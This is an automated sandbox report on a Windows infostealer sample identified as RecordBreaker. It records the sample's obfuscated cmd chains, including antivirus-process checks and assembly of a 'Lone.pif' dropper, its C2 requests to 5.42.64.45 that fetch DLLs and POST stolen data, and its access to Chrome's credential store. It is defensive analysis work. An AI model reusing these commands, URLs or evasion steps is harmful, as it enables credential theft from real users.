Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Dec. 11, 2023, 7:16 p.m.	Dec. 11, 2023, 7:48 p.m.

Size	1.3MB
Type	PE32 executable (console) Intel 80386, for MS Windows
MD5	`cbf9b27a8f0e0694c727f4365776b745`
SHA256	`345ff30f046fefaf38981f65238c022878d9ecab54437a88a7b5bddcba6ebc3d`
CRC32	`CC83E364`
ssdeep	`24576:Gc9fr4kJAx1q/o/Ugge7p+XgwUXKXeaWptGyvNjl:G+py15bgeF+SlptGyvdl`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file mzp_file_format - MZP(Delphi) file format

SoftwareMeetup.exe "C:\Users\test22\AppData\Local\Temp\SoftwareMeetup.exe"
2636
- cmd.exe cmd /k cmd < Lay & exit
  2784
  - cmd.exe cmd
    2844
    - tasklist.exe tasklist
      2888
    - findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      2924
    - tasklist.exe tasklist
      3056
    - findstr.exe findstr /I "wrsa.exe"
      812
    - cmd.exe cmd /c mkdir 18919
      2112
    - cmd.exe cmd /c copy /b Layer + Twenty + Celebrity + Transcription + Facing + Ultimately 18919\Lone.pif
      192
    - cmd.exe cmd /c copy /b Cal + Ict 18919\X
      2192
    - Lone.pif 18919\Lone.pif 18919\X
      2224
    - PING.EXE ping -n 5 localhost
      2416
Lone.pif C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif
604

Name	Response	Post-Analysis Lookup
OehFAoaJixIuGMFQDbBpv.OehFAoaJixIuGMFQDbBpv

IP Address	Status	Action
164.124.101.2	Active	Moloch
5.42.64.45	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2036934	ET MALWARE Win32/RecordBreaker CnC Checkin M1	A Network Trojan was detected
TCP 5.42.64.45:80 -> 192.168.56.101:49179	2036955	ET MALWARE Win32/RecordBreaker CnC Checkin - Server Response	A Network Trojan was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044305	ET HUNTING HTTP GET Request for nss3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 5.42.64.45:80 -> 192.168.56.101:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044307	ET HUNTING HTTP GET Request for vcruntime140.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044302	ET HUNTING HTTP GET Request for mozglue.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044303	ET HUNTING HTTP GET Request for freebl3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044306	ET HUNTING HTTP GET Request for softokn3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2044301	ET HUNTING HTTP GET Request for sqlite3.dll - Possible Infostealer Activity	A suspicious filename was detected
TCP 192.168.56.101:49179 -> 5.42.64.45:80	2036884	ET HUNTING Possible Generic Stealer Sending System Information	Misc activity

Suricata TLS

No Suricata TLS

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1	0

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 11, 2023, 7:16 p.m.			0	0

Command line console output was observed (50 out of 411 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Microsoft Windows [Version 6.1.7601] console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Copyright (c) 2009 Microsoft Corporation. All rights reserved. console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Set eIkCYSydEBVAUyChazfSHwIURsCdzbQq=i console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: WZHarxPXuHS=tKWgKIFNnqZdLGfPXiKVu console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'WZHarxPXuHS' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: pDGqdVrKUwwjhSxyMoxGFVZdHv=qqZWXnjAaIK console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'pDGqdVrKUwwjhSxyMoxGFVZdHv' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: KJNyYgmabxRxCAmjg=faTQrJVtrNwswveQKXRPw console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'KJNyYgmabxRxCAmjg' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: otGFoFxbZq=OasnTGtlTlLsyz console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'otGFoFxbZq' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: sMQCcnCglPlnAfJGOq=htLsQsMEoQv console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'sMQCcnCglPlnAfJGOq' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: AjNhIHbFOjtuJJiDUpEXsqyd=cqlIUxbNeJjNewYdcdqqEH console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'AjNhIHbFOjtuJJiDUpEXsqyd' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: ppJYjmcmubGh=jWUSGaHqVQSoFGVJydeNTw console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'ppJYjmcmubGh' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: Set lckgHpudvOstnvozkqugzRPGSmQwuEmNkbJvctZ=h console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: mcxgCvhWXQNNMuaGEvizypSgD=wNLXiqfmTccadeCtpNLqnsdQRIS console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'mcxgCvhWXQNNMuaGEvizypSgD' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: JdDyKIcmlqJNbjhXkj=tQqqtCDxKvVu console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'JdDyKIcmlqJNbjhXkj' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: iSQCRfIHHrTorYCktzF=CNGIfnDuhLrfUkFEvKyWD console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'iSQCRfIHHrTorYCktzF' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: bNiRwDqpFedAWxjihaL=zVZEgSzYPzgJwrdSBbbZ console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'bNiRwDqpFedAWxjihaL' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: tywZzglsgbMl=yCODDplezj console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'tywZzglsgbMl' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: GmTtxGPVMcgPYEVEoGBWBnZYN=XUgPeKTjaTc console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'GmTtxGPVMcgPYEVEoGBWBnZYN' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: XHHRnGQMPYHF=vSfjiAUddJ console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: 'XHHRnGQMPYHF' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp\35483> console_handle: 0x00000007	1	1
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: HWaDWLjwoeITfKqzowgZjJOGSDql=AQHYMlBhjQtMFvZNY console_handle: 0x00000007	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 11, 2023, 7:48 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

One or more processes crashed (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ Dec. 11, 2023, 7:48 p.m.	stacktrace: LdrResFindResourceDirectory+0x606 RtlEncodeSystemPointer-0x3d ntdll+0x3e01b @ 0x76f4e01b LdrLoadDll+0x2f5 _strcmpi-0x8a ntdll+0x3c72f @ 0x76f4c72f RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x76f4c389 RtlFlsAlloc+0x993 EtwNotificationRegister-0x13c ntdll+0x3f3f6 @ 0x76f4f3f6 RtlEncodeSystemPointer+0x33d RtlFindClearBits-0x454 ntdll+0x3e395 @ 0x76f4e395 RtlSetBits+0x115 RtlFlsAlloc-0x5e ntdll+0x3ea05 @ 0x76f4ea05 RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52 RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52 RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52 RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52 RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x76f4d69f LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x76f4c4b5 New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7354d4cf LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x75981d2a LoadLibraryW+0x11 GetModuleFileNameW-0x14 kernel32+0x1493c @ 0x755c493c 0x40ad0a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 83 38 48 0f 82 39 ff 01 00 8b 48 40 85 c9 0f 84 exception.symbol: LdrResFindResourceDirectory+0x9f RtlEncodeSystemPointer-0x5a4 ntdll+0x3dab4 exception.instruction: cmp dword ptr [eax], 0x48 exception.module: ntdll.dll exception.exception_code: 0xc0000006 exception.offset: 252596 exception.address: 0x76f4dab4 registers.esp: 7791508 registers.edi: 1 registers.eax: 268468152 registers.ebp: 7791512 registers.edx: 268468152 registers.ebx: 268435456 registers.esi: 1996562944 registers.ecx: 64	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Dec. 11, 2023, 7:48 p.m.

stacktrace:

LdrResFindResourceDirectory+0x606 RtlEncodeSystemPointer-0x3d ntdll+0x3e01b @ 0x76f4e01b
LdrLoadDll+0x2f5 _strcmpi-0x8a ntdll+0x3c72f @ 0x76f4c72f
RtlRunOnceComplete+0x3a4 LdrLoadDll-0xb1 ntdll+0x3c389 @ 0x76f4c389
RtlFlsAlloc+0x993 EtwNotificationRegister-0x13c ntdll+0x3f3f6 @ 0x76f4f3f6
RtlEncodeSystemPointer+0x33d RtlFindClearBits-0x454 ntdll+0x3e395 @ 0x76f4e395
RtlSetBits+0x115 RtlFlsAlloc-0x5e ntdll+0x3ea05 @ 0x76f4ea05
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
RtlInitializeSid+0x35 RtlEncodePointer-0x3c ntdll+0x40f8f @ 0x76f50f8f
RtlSetBits+0xea RtlFlsAlloc-0x89 ntdll+0x3e9da @ 0x76f4e9da
RtlSetBits+0x162 RtlFlsAlloc-0x11 ntdll+0x3ea52 @ 0x76f4ea52
RtlSetBits+0x5d RtlFlsAlloc-0x116 ntdll+0x3e94d @ 0x76f4e94d
LdrResSearchResource+0x943 LdrResFindResourceDirectory-0x376 ntdll+0x3d69f @ 0x76f4d69f
LdrLoadDll+0x7b _strcmpi-0x304 ntdll+0x3c4b5 @ 0x76f4c4b5
New_ntdll_LdrLoadDll@16+0x7b New_ntdll_LdrUnloadDll@4-0xb7 @ 0x7354d4cf
LoadLibraryExW+0x178 LoadLibraryExA-0x2a kernelbase+0x11d2a @ 0x75981d2a
LoadLibraryW+0x11 GetModuleFileNameW-0x14 kernel32+0x1493c @ 0x755c493c
0x40ad0a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: 83 38 48 0f 82 39 ff 01 00 8b 48 40 85 c9 0f 84
exception.symbol: LdrResFindResourceDirectory+0x9f RtlEncodeSystemPointer-0x5a4 ntdll+0x3dab4
exception.instruction: cmp dword ptr [eax], 0x48
exception.module: ntdll.dll
exception.exception_code: 0xc0000006
exception.offset: 252596
exception.address: 0x76f4dab4
registers.esp: 7791508
registers.edi: 1
registers.eax: 268468152
registers.ebp: 7791512
registers.edx: 268468152
registers.ebx: 268435456
registers.esi: 1996562944
registers.ecx: 64

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (9 events)

suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://5.42.64.45/
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://5.42.64.45/eaf08ca3e93323672f845af593b238c0

Performs some HTTP requests (9 events)

request	POST http://5.42.64.45/
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
request	GET http://5.42.64.45/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
request	POST http://5.42.64.45/eaf08ca3e93323672f845af593b238c0

Sends data using the HTTP POST Method (2 events)

request	POST http://5.42.64.45/
request	POST http://5.42.64.45/eaf08ca3e93323672f845af593b238c0

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 11, 2023, 7:16 p.m.	process_identifier: 2636 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:16 p.m.	process_identifier: 2636 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 11, 2023, 7:16 p.m.	process_identifier: 2224 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 11, 2023, 7:17 p.m.	process_identifier: 2224 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01120000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif
file	C:\Users\test22\AppData\LocalLow\msvcp140.dll
file	C:\Users\test22\AppData\LocalLow\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\vcruntime140.dll
file	C:\Users\test22\AppData\LocalLow\sqlite3.dll
file	C:\Users\test22\AppData\LocalLow\nss3.dll

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif

Drops an executable to the user AppData folder (9 events)

file	C:\Users\test22\AppData\LocalLow\vcruntime140.dll
file	C:\Users\test22\AppData\LocalLow\softokn3.dll
file	C:\Users\test22\AppData\LocalLow\nss3.dll
file	C:\Users\test22\AppData\LocalLow\msvcp140.dll
file	C:\Users\test22\AppData\Local\Temp\35483\Layer
file	C:\Users\test22\AppData\Local\Temp\35483\18919\Lone.pif
file	C:\Users\test22\AppData\LocalLow\mozglue.dll
file	C:\Users\test22\AppData\LocalLow\freebl3.dll
file	C:\Users\test22\AppData\LocalLow\sqlite3.dll

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (9 events)

Time & API	Arguments	Status	Return
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: mobsync.exe process_identifier: 2272	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: taskhost.exe process_identifier: 2528	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: SoftwareMeetup.exe process_identifier: 2636	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: WmiPrvSE.exe process_identifier: 3016	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: Lone.pif process_identifier: 2224	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000138 process_name: inject-x86.exe process_identifier: 2432	1	1
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003518 process_name: taskhost.exe process_identifier: 2816	1	1
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003518 process_name: Lone.pif process_identifier: 604	1	1
Process32NextW Dec. 11, 2023, 7:48 p.m.	snapshot_handle: 0x00003518 process_name: svchost.exe process_identifier: 1264	1	1

An executable file was downloaded by the process lone.pif (7 events)

Time & API	Arguments	Status	Return
InternetReadFile Dec. 11, 2023, 7:47 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELöñ9bà"!à&Ð`ýÑ@Aø!\T¿@@x ¸Ph hýð ðÄ\!@.textiÞà `.rdataäéðêä@@.dataNà*Î@À.00cfg0ø@@.rsrcx@ú@@.reloch Pþ@BUåSWV]u~ÿt@ pàÿ0WÿÑÄ~1ÀÛÀÁàHFDÿt xàÿ0WÿÑÄ1À^_[]Ã1ÀÛÀÁàHFDëéÌÌÌÌÌÌÌÌÌÌÌÌÌUåWVìuþ3'u7¿èÿÿ=ta¡l$ÿ`ÇìÀt:x(p,Ç@0Ä^_]Ã¿²èÿÿþ~2çØÿÿø8wmÿ$èx¿¦èÿÿë¨(ñ$èÀë´èI"ëþæ þoóþOIþ&ÅFþøþ !¿ÐèÿÿéIÿÿÿþ ¿èÿÿé3ÿÿÿ¿èÿÿé)ÿÿÿ¿¯èÿÿéÿÿÿ¿¶èÿÿéÿÿÿ¿´èÿÿéÿÿÿ¿³èÿÿéÿÿÿ¿¢èÿÿé÷þÿÿ¿ èÿÿéíþÿÿ¿×èÿÿéãþÿÿþÈþí¿þå/þç7þãu¿Ñèÿÿéþÿÿþa _¿èÿÿéþÿÿþþzþpÏþx.¿èÿÿéVþÿÿþØþÏßþÉg¿£èÿÿé(þÿÿþkÖþPa¿Éèÿÿéþÿÿþ½ÊþîJ¿èÿÿéêýÿÿþÍ¾þAÿÿÿþ·t´éþo¯þÙ¿èÿÿé£ýÿÿþ'¿¼èÿÿéýÿÿþætþéJ¿èÿÿérýÿÿþ{î¿èÿÿé_ýÿÿþÐæ¿ÙèÿÿéIýÿÿþlå¿ºèÿÿé6ýÿÿþ¾Ú¿èÿÿé ýÿÿþÎÖ¿Áèÿÿé ýÿÿþpmþÿÿþqaþÿÿþø´¿ªèÿÿéÜüÿÿÿ$x¿ÂèÿÿéËüÿÿþÏ¿¤èÿÿéµüÿÿþWCÿÿÿëxþg þÿÿëjþßub¿Óèÿÿéüÿÿþ request_handle: 0x00cc000c	1	1
